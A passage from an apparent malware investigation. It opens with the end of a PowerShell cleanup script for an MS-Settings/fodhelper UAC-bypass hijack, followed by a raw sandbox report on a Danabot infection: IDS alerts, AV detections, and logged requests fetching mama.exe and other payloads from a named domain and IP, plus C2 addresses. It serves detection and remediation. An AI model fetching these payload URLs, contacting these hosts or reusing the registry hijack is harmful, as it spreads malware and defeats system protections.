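    foreach ($key in $keys | Select-Object -Unique) {
        if ((Test-Path $key) -and $PSCmdlet.ShouldProcess($key, 'Remove registry key')) {
            Remove-Item -Path $key -Recurse -Force
        }
    }
}

# Report first; preview the removal with -WhatIf, then run it without.
Get-MsSettingsHijack | Format-List
Remove-MsSettingsHijack -WhatIf
```

Two caveats from this report. First, the malware deletes both keys seconds after FoDHelper.exe runs, so a clean hive at scan time proves nothing; the reg.exe process-creation events (REG ADD on MS-Settings\CurVer followed by fodhelper.exe with a cmd.exe child) are the durable evidence. Second, if CurVer had been pointed at a legitimate ProgID, removing that ProgID would break a real file association, which is why the removal is gated by ShouldProcess and should be previewed with -WhatIf.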
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:05:12.520857+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 150.241.97.10 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:06:42.110836+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49903 | 188.132.183.159 | 443 | TCP
2024-12-27T09:06:43.310390+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49908 | 206.206.125.221 | 443 | TCP
2024-12-27T09:06:44.453950+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49912 | 94.131.118.216 | 443 | TCP
2024-12-27T09:06:45.582391+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49915 | 188.132.183.159 | 443 | TCP
2024-12-27T09:06:53.596487+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49939 | 188.132.183.159 | 443 | TCP
2024-12-27T09:06:55.532704+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49942 | 206.206.125.221 | 443 | TCP
2024-12-27T09:06:56.636525+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49947 | 94.131.118.216 | 443 | TCP
2024-12-27T09:06:57.744654+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49949 | 188.132.183.159 | 443 | TCP
2024-12-27T09:07:03.248647+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49968 | 188.132.183.159 | 443 | TCP
2024-12-27T09:07:03.338643+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49969 | 206.206.125.221 | 443 | TCP
2024-12-27T09:07:03.422521+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49970 | 94.131.118.216 | 443 | TCP
2024-12-27T09:07:03.509957+0100 | 2034465 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49971 | 188.132.183.159 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T09:05:28.138283+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49731 | 150.241.97.10 | 443 | TCP


          AV Detection

Source: C:\Users\user\AppData\Roaming\mama.exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\mama.exe | ReversingLabs: Detection: 71%
Source: A4FY1OA97K.lnk | Virustotal: Detection: 41%
Source: A4FY1OA97K.lnk | ReversingLabs: Detection: 34%
Source: Yara match | File source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Users\user\AppData\Roaming\mama.exe | Joe Sandbox ML: detected
Source: A4FY1OA97K.lnk | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: 46_2_0306E190 FindFirstFileW,FindClose, 46_2_0306E190
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: 46_2_0306DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 46_2_0306DBC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

          Networking

Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49903 -> 188.132.183.159:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49908 -> 206.206.125.221:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49915 -> 188.132.183.159:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49912 -> 94.131.118.216:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49939 -> 188.132.183.159:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49942 -> 206.206.125.221:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49947 -> 94.131.118.216:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49949 -> 188.132.183.159:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49969 -> 206.206.125.221:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49971 -> 188.132.183.159:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49970 -> 94.131.118.216:443
Source: Network traffic | Suricata IDS: 2034465 - Severity 1 - ET MALWARE Danabot Key Exchange Request : 192.168.2.7:49968 -> 188.132.183.159:443
Source: global traffic | HTTP traffic detected:
    GET /ggg.pdf HTTP/1.1
    Host: pravo-bashkortostan.ru
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /mama.exe HTTP/1.1
    Host: pravo-bashkortostan.ru
Source: Joe Sandbox View | ASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
Source: Joe Sandbox View | ASN Name: HYPEENT-SJUS
Source: Joe Sandbox View | ASN Name: NASSIST-ASGI
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49699 -> 150.241.97.10:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49731 -> 150.241.97.10:443
Source: global traffic | HTTP traffic detected:
    GET /aaa.mp4 HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 150.241.97.10
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 94.131.118.216
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 188.132.183.159
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
Source: unknown | TCP traffic detected without corresponding DNS query: 206.206.125.221
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 94.131.118.216
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
          Source: unknownTCP traffic detected without corresponding DNS query: 188.132.183.159
Source: global traffic | HTTP traffic detected: GET /aaa.mp4 HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 150.241.97.10; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ggg.pdf HTTP/1.1; Host: pravo-bashkortostan.ru; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mama.exe HTTP/1.1; Host: pravo-bashkortostan.ru
Source: global traffic | DNS traffic detected: DNS query: pravo-bashkortostan.ru
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
          Source: powershell.exe, 00000010.00000002.1588516515.000001A5A25A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: svchost.exe, 0000000E.00000002.2534641248.000001FA6F88C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: 77EC63BDA74BD0D0E0426DC8F80085060.34.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A62CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pravo-bashkortostan.ru
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD62D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A4876000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A487A000.00000004.00000800.00020000.00000000.sdmp, ggg.pdf.16.drString found in binary or memory: http://www.aiim.org/pdfua/ns/id/
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: mama.exe, 0000002E.00000003.1690353653.000000007EB44000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063469000.00000040.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000003.1694358130.000000007EB1A000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2569666580.000000006E66F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
          Source: mama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: mama.exe, 0000002E.00000003.1686533441.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2563240393.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
          Source: 2D85F72862B55C4EADD9E66E06947F3D0.34.drString found in binary or memory: http://x1.i.lencr.org/
          Source: powershell.exe, 00000008.00000002.1314828772.0000026DEE53A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD67C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.
          Source: mshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/
          Source: mshta.exe, 00000009.00000002.1695531974.000001FC4D776000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/L
          Source: mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687826620.000002045031D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695579292.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, A4FY1OA97K.lnkString found in binary or memory: https://150.241.97.10/aaa.mp4
          Source: powershell.exeString found in binary or memory: https://150.241.97.10/aaa.mp4$global:?
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4-1-0
          Source: mshta.exe, 00000009.00000002.1700961304.0000020450300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4...
          Source: mshta.exe, 00000009.00000003.1670473228.0000020450342000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687261023.0000020450359000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1701291403.000002045035B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4...X7o(
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp41-0
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp46)g
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4;
          Source: mshta.exe, 00000009.00000002.1695655072.000001FC4D7B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1669958089.000001FC4D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4C:
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4E
          Source: mshta.exe, 00000009.00000002.1695212616.000001FC4D6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4H
          Source: powershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4PCU
          Source: powershell.exe, 00000008.00000002.1314419679.0000026DEE47C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4U
          Source: mshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4cL
          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4g
          Source: mshta.exe, 00000009.00000003.1683955749.0000020454955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4https://150.241.97.10/aaa.mp4
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4l
          Source: powershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4lePa
          Source: powershell.exe, 00000008.00000002.1303247475.0000026DD47D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4m32;C:
          Source: mshta.exe, 00000009.00000002.1696165749.000001FC4D970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4ndow
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD62C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4p
          Source: mshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4zL
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.X
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD630D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000000E.00000003.1310921737.000001FA6F670000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A5433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: mshta.exe, 00000009.00000003.1687406678.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695579292.000001FC4D792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comnM
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: qmgr.db.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdf
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdfp
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A48B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exe
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A48B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exeu
          Source: ReaderMessages.33.drString found in binary or memory: https://www.adobe.co
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
